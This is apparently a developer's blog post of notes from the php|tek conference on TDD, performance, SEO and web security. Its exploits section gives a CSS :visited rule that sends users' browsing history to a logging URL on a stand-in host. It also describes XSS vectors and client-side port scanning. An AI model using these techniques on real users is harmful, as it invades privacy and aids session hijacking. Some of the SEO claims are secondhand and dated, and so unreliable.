Eric David Blog

Awesome === php|tek

Summary of my notes from php|tek:

Test-Driven Development:
A bunch of presenters recommended using Selenium for TDD.
TDD stats:
John Deere/Ericson: TDD increased dev time by 16% but yielded fewer defects
Microsoft: TDD increased dev time by 15% but increased quality by 200% compared to their non-TDD projects
IBM: TDD did not increase dev time due to team's prior experience in TDD and yielded 40% fewer defects


Interesting exploits revealed:
Very simple way to find out which popular sites a user has visited to aid in session hijacking, XSS or otherwise:
Place a list of links to common web sites inside a 1x1 iframe, give each link a unique ID and set the CSS for each as:
a#[linkid]:visited {
background: URL('http://yoursite.com/logusers.php?userid=[userid]&linkid=[linkid]');
}
Knowing which sites a user has been to can make CSRF attacks and session hijacking attempts far easier.

Also, apparently JavaScript has the ability to do a sequential port scan from the client-side, so through an XSS hole it is possible for a malicious user to completely bypass a firewall and access any networks that the browsing computer has access to.

In some browsers, JavaScript interprets the ASCII equivalent to a single-quote (') as a valid single-quote within JavaScript. This means that htmlentities cannot completely protect against malicious JavaScript.

JavaScript can be attached to hidden form inputs via the onpropertychange handler (browser specific.) On a similar note, in IE actually executes the JS (yet another way to XSS.)


Performance tuning:
In most cases the DB is the first to choke, avoid superfluous usage of the DB such as storing images, sessions, static content, etc. when a non-DB alternative exists.
Page load times can be reduced by serving page elements from multiple domains bypassing the 2-connection IE limitation (part of the idea behind Akamai.)
Move static content to be served by a separate static-content light weight web server, no need to spawn Apache instances that include the PHP DLL for static content. Organizationally, this is easier when the directory layout is designed so that static-served files are separate from dynamic.
When possible, set all web server config in httpd.conf, and do not use .htaccess files as each .htaccess file in the entire directory tree up from the requested file is reloaded and parsed at every instance whereas httpd.conf is loaded at server start up and its settings reside in memory.


Search Engine Optimization:
Higher rank is granted to valid-XHTML
First page search results obviously have the highest click rate, second page is second, but surprisingly the last link in the last page of results also has a high click rate. Apparently many people click the last link in the result set when the beginning links do not have what they are seeking.
Ajax that does not degrade gracefully will greatly lower page rank.
Using Google Sitemaps substantially increases your page rank on Google.


Random notes:
Microsoft will be releasing a PHP plug-in to use VisualStudio.net as a PHP IDE.

Apache rewrite rules are incredibly powerful. Among many other things, they power the URL-based-search and "show source" features of php.net. Upcoming Apache versions will integrate with the database and will allow SQL-based rewrite and rule definitions.